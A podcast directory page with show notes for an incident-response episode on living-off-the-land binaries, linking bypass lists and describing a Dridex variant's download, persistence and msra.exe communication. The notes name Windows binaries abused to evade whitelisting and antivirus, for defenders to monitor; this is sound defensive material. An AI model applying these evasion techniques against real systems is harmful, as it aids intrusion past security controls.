×

Home Top Podcaster Networks By Language By Country By Category About Us Contact Us Faqs Features News & Blogs Privacy Policy Terms Of Use

☰

Search

Home > The Incident Response Podcast > Ep 012 - Laughing at Binaries - LOLBin/LOLBas


	Podcast:		The Incident Response Podcast
	Episode:		Ep 012 - Laughing at Binaries - LOLBin/LOLBas
	Category:		Technology
	Duration:		00:49:30
	Publish Date:		2020-05-17 21:27:16
	Description:		Formerly the Brakeing Down Incident Response Podcast Recorded Oct 2019 TOPIC: Laughing at Binaries - LOLBin/LOLBas OUR GUEST WILL BE: Oddvar Moe, Sr. Security Consultant TrustedSec - Red Teamer @Oddvarmoe Blog - https://oddvar.moe/ lolbas-project.com https://github.com/api0cradle/UltimateAppLockerByPassList https://github.com/api0cradle/PowerAL OUR SPONSORS: NEWS-WORTHY: Cyber Security Awareness Month Share something that can help SMBs, your family or friends Flaw with SUDO that lets you get admin priv when denied Patch patch patch... Microsoft Enables Tamper Protection by Default for all Windows 10 Users to Defend Against Attacks https://go.newsfusion.com//security/item/1524577 Most Americans do not know what MFA is???? https://securityboulevard.com/2019/10/most-americans-dont-know-what-2fa-is-pew-research-shows/ Hackers bypassing some types of 2FA security FBI warns https://nakedsecurity.sophos.com/2019/10/11/hackers-bypassing-some-types-of-2fa-security-fbi-warns/ SITE-WORTHY: Malware Archaeology Logging tips - List of Binaries to monitor https://www.malwarearchaeology.com/logging Guest - LolBin/LolBas - api0cradle - aka Oddvar Moe https://lolbas-project.github.io/ https://github.com/LOLBAS-Project/LOLBAS https://gtfobins.github.io/ http://www.hexacorn.com/blog/ TOOL-WORTHY: HUMIO - Free 2GB/day 7 day retention https://www.Humio.com Guest: https://github.com/PowerShellMafia/CimSweep - Matt Graeber – Agentless using CIM/WMI http://nirsoft.net/ (DLL Export viewer, Reg DLL View, Password recovery, network tools +++) Get injected-thread by Jared Atkinson - https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2 https://github.com/Neo23x0/sigma - Standardized ruleset for SIEMs MALWARE OF THE MONTH: New Dridex version Delivered via Office document or Email with URL wscript/csript downloads bad binary named Chrome.exe Calls Scheduled task for persistence Chrome calls msra.exe for comms C:\Windows\syswow64\Msra.exe chrome.exe So another LOLBin ? This is what prompted this podcast TOPIC OF THE DAY: Laughing at Binaries - LOLBin/LOLBas What is a LOLBin and LOLBas? It stands for Living off the Land Binary and Scripts Libraries too, Dlls What started all this? @SubTee Casey Smith efforts on Application Whitelisting bypasses from 2015 ish where he found ways to use existing binaries on the system to do bad things like RegSvr32, RegAsm, RunDll32, and several others Why are these an issue for us Defenders? Well Pentesters and Red Teams use them to get around security solutions like AV, EDR and App Whitelisting Do these normally execute? If so how noisy are they? Some are noisy What do we need to watch out for? Command line parameters are key What is are the parameters they are executing with these utilities Are there any lists people can use? Malware Archaeology Logging page has a list and link to Oddvar’s page What about security solutions, do we need to be concerned with these? Yes, many AV and EDRs will not have alerts for these items You will need to build some alerts and filter out the good/noise What about logging theme? Use the list(s) and build a lookup list that you can add to 4688 events or Sysmon 1 and 7 events and monitor them What about MITRE ATT&CK, do they reference these? Yes, there are several of these mentioned in MITRE ATT&CK, so map your tools to ATT&CK Techniques Are there ways to test for these LOLs What else do people need to watch out for? Other Articles: ------------------- Casey Smith @SubTee - Red Canary Bypassing Application Whitelisting SHMOOCon 2015 - https://youtu.be/XVuboBH5TYo SANS https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1524509113.pdf DerbyCon 2016 - http://www.irongeek.com/i.php?page=videos/derbycon6/522-establishing-a-foothold-with-javascript-casey-smith DerbyCon 2019 - http://www.irongeek.com/i.php?page=videos/derbycon9/stable-28-net-manifesto-win-friends-and-influence-the-loader-casey-smith Oddvar Moe talk on LOLBin at DerbyCon 2018 https://www.youtube.com/watch?v=NiYTdmZ8GR4 Alternate Data Streams: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
	Total Play:		0